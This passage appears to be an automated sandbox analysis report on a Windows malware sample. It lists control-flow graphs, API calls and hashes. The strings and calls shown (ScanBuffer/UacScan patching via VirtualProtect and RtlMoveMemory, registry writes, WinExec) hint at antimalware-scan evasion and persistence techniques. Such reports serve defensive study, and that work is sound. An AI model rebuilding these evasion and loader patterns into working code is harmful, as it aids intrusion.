28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a2ee0 call 28a2f08 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 GetCurrentProcess call 28b7968 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 10039->10158 10603 28c5cba-28c5f98 call 28b5aa8 call 28a4b90 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a49bc RtlMoveMemory call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28ba1c0 call 28a36c4 10040->10603 10604 28c5cb5-28c5cb8 10040->10604 10293 28c6cdd-28c6cec call 28a48b0 10157->10293 10294 28c74a8-28c8b96 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 * 16 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 ExitProcess 10157->10294 10861 28c69bb-28c6b4f call 28a49bc call 28bc5bc call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 EnumSystemLocalesA 10158->10861 10862 28c69b6-28c69b9 10158->10862 10293->10294 10307 28c6cf2-28c6fc5 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bd198 call 28a4824 call 28a4964 call 28a4698 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a7e18 10293->10307 10628 28c6fcb-28c729d call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bc74c call 28a44f4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4da4 * 2 call 28a4728 call 28bc3f8 10307->10628 10629 28c72a2-28c74a3 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a49bc call 28b7f48 10307->10629 10604->10603 10628->10629 10629->10294 10861->10157 10862->10861
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A), ref: 028B7C18
                                                                                                                                • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                                • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028B7C37
                                                                                                                                • Part of subcall function 028BD318: RegOpenKeyA.ADVAPI32(?,00000000,02905798), ref: 028BD35C
                                                                                                                                • Part of subcall function 028BD318: RegSetValueExA.ADVAPI32(00000870,00000000,00000000,00000001,00000000,0000001C,00000000,028BD3C7), ref: 028BD394
                                                                                                                                • Part of subcall function 028BD318: RegCloseKey.ADVAPI32(00000870,00000870,00000000,00000000,00000001,00000000,0000001C,00000000,028BD3C7), ref: 028BD39F
                                                                                                                              • WinExec.KERNEL32(00000000,00000000), ref: 028C57F9
                                                                                                                                • Part of subcall function 028B9E70: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 028B9F33
                                                                                                                              • RtlMoveMemory.N(00000000,00000004,00000000,?,ScanBuffer,02905344,028C8FEC,UacScan,02905344,028C8FEC,OpenSession,02905344,028C8FEC,OpenSession,02905344,028C8FEC), ref: 028C5D7B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
                                                                                                                              • String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                                                                              • API String ID: 897696978-872072817
                                                                                                                              • Opcode ID: 6a109a0dbd2517aab2ed5b4b6ed7a3f8b87bad5c65431683da53aad80fb34353
                                                                                                                              • Instruction ID: e722111b739eafcd5022214d07d12906e64ae0d88fc712fc4db56fe8122127d8
                                                                                                                              • Opcode Fuzzy Hash: 6a109a0dbd2517aab2ed5b4b6ed7a3f8b87bad5c65431683da53aad80fb34353
                                                                                                                              • Instruction Fuzzy Hash: 4F921C3DA542588FEF11EB68D8909DDB3B6AF89700F2084E5A149E7354DFB0AE85CF41
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A1724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 11747 28a1724-28a1736 11748 28a1968-28a196d 11747->11748 11749 28a173c-28a174c 11747->11749 11752 28a1973-28a1984 11748->11752 11753 28a1a80-28a1a83 11748->11753 11750 28a174e-28a175b 11749->11750 11751 28a17a4-28a17ad 11749->11751 11756 28a175d-28a176a 11750->11756 11757 28a1774-28a1780 11750->11757 11751->11750 11760 28a17af-28a17bb 11751->11760 11758 28a1938-28a1945 11752->11758 11759 28a1986-28a19a2 11752->11759 11754 28a1a89-28a1a8b 11753->11754 11755 28a1684-28a16ad VirtualAlloc 11753->11755 11765 28a16df-28a16e5 11755->11765 11766 28a16af-28a16dc call 28a1644 11755->11766 11762 28a176c-28a1770 11756->11762 11763 28a1794-28a17a1 11756->11763 11767 28a1782-28a1790 11757->11767 11768 28a17f0-28a17f9 11757->11768 11758->11759 11764 28a1947-28a195b Sleep 11758->11764 11769 28a19b0-28a19bf 11759->11769 11770 28a19a4-28a19ac 11759->11770 11760->11750 11761 28a17bd-28a17c9 11760->11761 11761->11750 11772 28a17cb-28a17de Sleep 11761->11772 11764->11759 11777 28a195d-28a1964 Sleep 11764->11777 11766->11765 11775 28a17fb-28a1808 11768->11775 11776 28a182c-28a1836 11768->11776 11773 28a19d8-28a19e0 11769->11773 11774 28a19c1-28a19d5 11769->11774 11771 28a1a0c-28a1a22 11770->11771 11783 28a1a3b-28a1a47 11771->11783 11784 28a1a24-28a1a32 11771->11784 11772->11750 11779 28a17e4-28a17eb Sleep 11772->11779 11780 28a19fc-28a19fe call 28a15cc 11773->11780 11781 28a19e2-28a19fa 11773->11781 11774->11771 11775->11776 11782 28a180a-28a181e Sleep 11775->11782 11785 28a18a8-28a18b4 11776->11785 11786 28a1838-28a1863 11776->11786 11777->11758 11779->11751 11790 28a1a03-28a1a0b 11780->11790 11781->11790 11782->11776 11792 28a1820-28a1827 Sleep 11782->11792 11796 28a1a68 11783->11796 11797 28a1a49-28a1a5c 11783->11797 11784->11783 11793 28a1a34 11784->11793 11788 28a18dc-28a18eb call 28a15cc 11785->11788 11789 28a18b6-28a18c8 11785->11789 11794 28a187c-28a188a 11786->11794 11795 28a1865-28a1873 11786->11795 11806 28a18fd-28a1936 11788->11806 11810 28a18ed-28a18f7 11788->11810 11799 28a18ca 11789->11799 11800 28a18cc-28a18da 11789->11800 11792->11775 11793->11783 11803 28a18f8 11794->11803 11804 28a188c-28a18a6 call 28a1500 11794->11804 11795->11794 11802 28a1875 11795->11802 11798 28a1a6d-28a1a7f 11796->11798 11797->11798 11805 28a1a5e-28a1a63 call 28a1500 11797->11805 11799->11800 11800->11806 11802->11794 11803->11806 11804->11806 11805->11798
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNEL32(00000000,?,028A1FC1), ref: 028A17D0
                                                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,028A1FC1), ref: 028A17E6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: 9557bdb2f0afba213b7dad5a670953ea3976005cb389cc8df0f5ea9733c373f3
                                                                                                                              • Instruction ID: b6d7b1859fe220f6f63efae3dead47effa94aaaf3c715718416c65ddf12ad661
                                                                                                                              • Opcode Fuzzy Hash: 9557bdb2f0afba213b7dad5a670953ea3976005cb389cc8df0f5ea9733c373f3
                                                                                                                              • Instruction Fuzzy Hash: 08B1127EA052548FE715CF2CD4E8365BBE1EB85364F18866ED80DCB389CB70A451CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028B7B20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45librarymemoryloaderCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,028B7BA5,?,?,00000000,00000000), ref: 028B7B61
                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32), ref: 028B7B67
                                                                                                                              • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,028B7BA5,?,?,00000000,00000000), ref: 028B7B81
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                              • String ID: irtualProtect$kernel32
                                                                                                                              • API String ID: 2099061454-2063912171
                                                                                                                              • Opcode ID: e5aa2c2a7ef152619f8373fc908043ce86fdf3e52841802536f3522aaf0a74a3
                                                                                                                              • Instruction ID: 446cce8b1ad4ca146ec905d42ebbe1bcc052f52526a694205ee94e9baaf12ce1
                                                                                                                              • Opcode Fuzzy Hash: e5aa2c2a7ef152619f8373fc908043ce86fdf3e52841802536f3522aaf0a74a3
                                                                                                                              • Instruction Fuzzy Hash: 5001217D604348AFEB01EFA8DC51EAAF7EDEF88710F654464B504E3780DA74AA108E25
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A1A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 11826 28a1a8c-28a1a9b 11827 28a1b6c-28a1b6f 11826->11827 11828 28a1aa1-28a1aa5 11826->11828 11829 28a1c5c-28a1c60 11827->11829 11830 28a1b75-28a1b7f 11827->11830 11831 28a1b08-28a1b11 11828->11831 11832 28a1aa7-28a1aae 11828->11832 11838 28a16e8-28a170b call 28a1644 VirtualFree 11829->11838 11839 28a1c66-28a1c6b 11829->11839 11834 28a1b3c-28a1b49 11830->11834 11835 28a1b81-28a1b8d 11830->11835 11831->11832 11833 28a1b13-28a1b27 Sleep 11831->11833 11836 28a1adc-28a1ade 11832->11836 11837 28a1ab0-28a1abb 11832->11837 11833->11832 11840 28a1b2d-28a1b38 Sleep 11833->11840 11834->11835 11841 28a1b4b-28a1b5f Sleep 11834->11841 11842 28a1b8f-28a1b92 11835->11842 11843 28a1bc4-28a1bd2 11835->11843 11846 28a1af3 11836->11846 11847 28a1ae0-28a1af1 11836->11847 11844 28a1abd-28a1ac2 11837->11844 11845 28a1ac4-28a1ad9 11837->11845 11854 28a170d-28a1714 11838->11854 11855 28a1716 11838->11855 11840->11831 11841->11835 11853 28a1b61-28a1b68 Sleep 11841->11853 11851 28a1b96-28a1b9a 11842->11851 11843->11851 11852 28a1bd4-28a1bd9 call 28a14c0 11843->11852 11849 28a1af6-28a1b03 11846->11849 11847->11846 11847->11849 11849->11830 11857 28a1bdc-28a1be9 11851->11857 11858 28a1b9c-28a1ba2 11851->11858 11852->11851 11853->11834 11859 28a1719-28a1723 11854->11859 11855->11859 11857->11858 11861 28a1beb-28a1bf2 call 28a14c0 11857->11861 11862 28a1bf4-28a1bfe 11858->11862 11863 28a1ba4-28a1bc2 call 28a1500 11858->11863 11861->11858 11865 28a1c2c-28a1c59 call 28a1560 11862->11865 11866 28a1c00-28a1c28 VirtualFree 11862->11866
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNEL32(00000000,?), ref: 028A1B17
                                                                                                                              • Sleep.KERNEL32(0000000A,00000000,?), ref: 028A1B31
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: 2ceaa96dde7d7cdd782c3014018830d0f99b6a8d8cc97d844fdd55fbe8121a58
                                                                                                                              • Instruction ID: 20eab296e3287392e7378392905eb18ab9cfc9b3c758e45a972c3a0bc91e23cd
                                                                                                                              • Opcode Fuzzy Hash: 2ceaa96dde7d7cdd782c3014018830d0f99b6a8d8cc97d844fdd55fbe8121a58
                                                                                                                              • Instruction Fuzzy Hash: 7A51DF7DA062408FF715CF6C89D8766BBD4AF45314F1881AED84CCB286EB60E446CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028BC8AA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 028BC9EA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CheckConnectionInternet
                                                                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                              • API String ID: 3847983778-3852638603
                                                                                                                              • Opcode ID: 69da396a7aa09e955e0d409f0a66ece5f1a5d63a3d1e6f40ae2c9a8ae212f697
                                                                                                                              • Instruction ID: 001a4de5c3ee2856881a1c5dadf9d09fb1a7d5406c932c0b7acd2b6e5c606cfc
                                                                                                                              • Opcode Fuzzy Hash: 69da396a7aa09e955e0d409f0a66ece5f1a5d63a3d1e6f40ae2c9a8ae212f697
                                                                                                                              • Instruction Fuzzy Hash: B6410A3DA102489FFF01EAA8D850EEEB3B6AF49700F205426E041F7351DEB4A9158F51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028B5BE8 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,028B5D30,?,?,028B38BC,00000001), ref: 028B5C44
                                                                                                                              • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,028B5D30,?,?,028B38BC,00000001), ref: 028B5C72
                                                                                                                                • Part of subcall function 028A7D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,028B38BC,028B5CB2,00000000,028B5D30,?,?,028B38BC), ref: 028A7D66
                                                                                                                                • Part of subcall function 028A7F54: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,028B38BC,028B5CCD,00000000,028B5D30,?,?,028B38BC,00000001), ref: 028A7F73
                                                                                                                              • GetLastError.KERNEL32(00000000,028B5D30,?,?,028B38BC,00000001), ref: 028B5CD7
                                                                                                                                • Part of subcall function 028AA734: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,028AC395,00000000,028AC3EF), ref: 028AA753
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 503785936-0
                                                                                                                              • Opcode ID: 3ec06a220b5348e90b547d7b85cb3a30faf95a4f738a566312f83301489f0b5b
                                                                                                                              • Instruction ID: b3fbe14d1a345e4b2b6c01adc02b04ac2ebf76b3e6bf580a5e6562955a48fb68
                                                                                                                              • Opcode Fuzzy Hash: 3ec06a220b5348e90b547d7b85cb3a30faf95a4f738a566312f83301489f0b5b
                                                                                                                              • Instruction Fuzzy Hash: 8031667CA002089FEB01DBACC8917EDB7B6AF48704F948569E504E7384DB795905CFA6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028BD316 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyA.ADVAPI32(?,00000000,02905798), ref: 028BD35C
                                                                                                                              • RegSetValueExA.ADVAPI32(00000870,00000000,00000000,00000001,00000000,0000001C,00000000,028BD3C7), ref: 028BD394
                                                                                                                              • RegCloseKey.ADVAPI32(00000870,00000870,00000000,00000000,00000001,00000000,0000001C,00000000,028BD3C7), ref: 028BD39F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 779948276-0
                                                                                                                              • Opcode ID: 4d957b674424d88a96b8ba58eadd824ed4415ea94fcee0b4ab981201b3959c82
                                                                                                                              • Instruction ID: e9dd35f5d89da4d7f6b76ab3908efb29da7b93ca26aa54a5403d12c5b9b4e799
                                                                                                                              • Opcode Fuzzy Hash: 4d957b674424d88a96b8ba58eadd824ed4415ea94fcee0b4ab981201b3959c82
                                                                                                                              • Instruction Fuzzy Hash: 0D112B7C644208AFEF01EBA8C8A19AE77EDFB09310F944464B518D7254EA74ED149F62
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028BD318 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyA.ADVAPI32(?,00000000,02905798), ref: 028BD35C
                                                                                                                              • RegSetValueExA.ADVAPI32(00000870,00000000,00000000,00000001,00000000,0000001C,00000000,028BD3C7), ref: 028BD394
                                                                                                                              • RegCloseKey.ADVAPI32(00000870,00000870,00000000,00000000,00000001,00000000,0000001C,00000000,028BD3C7), ref: 028BD39F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 779948276-0
                                                                                                                              • Opcode ID: d68b03dcaf7b4f9bcaea6ba5d7cd5c367da12c166be0cfc54fd05d511f0b975b
                                                                                                                              • Instruction ID: 8c7c348abcac2c96566da3d7ab4306ea5b27b30165c957f2289bcb5e1fdeddbb
                                                                                                                              • Opcode Fuzzy Hash: d68b03dcaf7b4f9bcaea6ba5d7cd5c367da12c166be0cfc54fd05d511f0b975b
                                                                                                                              • Instruction Fuzzy Hash: 43113D7C644208AFEF01EFA8C8A19AE77EDFB09310F944464B518D7254EB74ED149F62
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028B7BE8 Relevance: 4.6, APIs: 3, Instructions: 52libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryW.KERNEL32(?,00000000,028B7C9A), ref: 028B7C18
                                                                                                                              • GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 028B7C37
